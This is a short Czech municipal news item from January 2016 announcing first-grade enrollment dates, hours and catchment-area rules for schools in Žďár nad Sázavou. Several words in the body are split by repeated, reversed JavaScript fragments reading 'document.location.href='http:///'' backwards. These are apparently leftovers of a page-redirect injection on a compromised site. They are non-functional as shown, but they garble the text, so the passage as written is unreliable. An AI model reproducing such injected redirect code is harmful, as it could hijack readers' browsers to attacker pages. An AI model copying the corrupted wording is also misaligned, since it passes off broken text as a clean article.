Rainbow page separator

Žďárské předškoláky čekají zápisy do prvních tříd

Středa, 13. ledna 2016

Žďár nad Sázavou / Na pátek 22. a sobotu 23. ledna je naplánován zápis dětí do prvních tříd žďárských základních škol pro školní rok 2016/2017. V pátek se rodiče se svými předškolními dětmi mohou do jednotlivých škol dostavit v době do 14 do 17 hodin, v sobotu pak od 9 do 11 hodin. Jedná se o všechny čtyři základní školy včetně odloučeného pracoviště Základní školy Švermova ve žďárském zámku.
Informace o zápisu do 1. tříd budou rovněž zveřejněny na vstupních dveřích budov všech školních zařízení a jejich webových stránkách.
Z důvodu optimálního rozmístění dětí do všech žďárských škol platí místní vyhláška o spádových obvodech, které by měli rodiče předškoláků respek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat. Za předpokladu, že rodiče mají zájem zapsat svého po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomka do jiné školy, než je spádová oblast podle jeho bydliště, mohou tak učinit v případě splnění kritérií pro přijímání žáků do 1. tříd jimi vybrané školy.
Ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to kritéria školy zveřejnění na svých webových stránkách.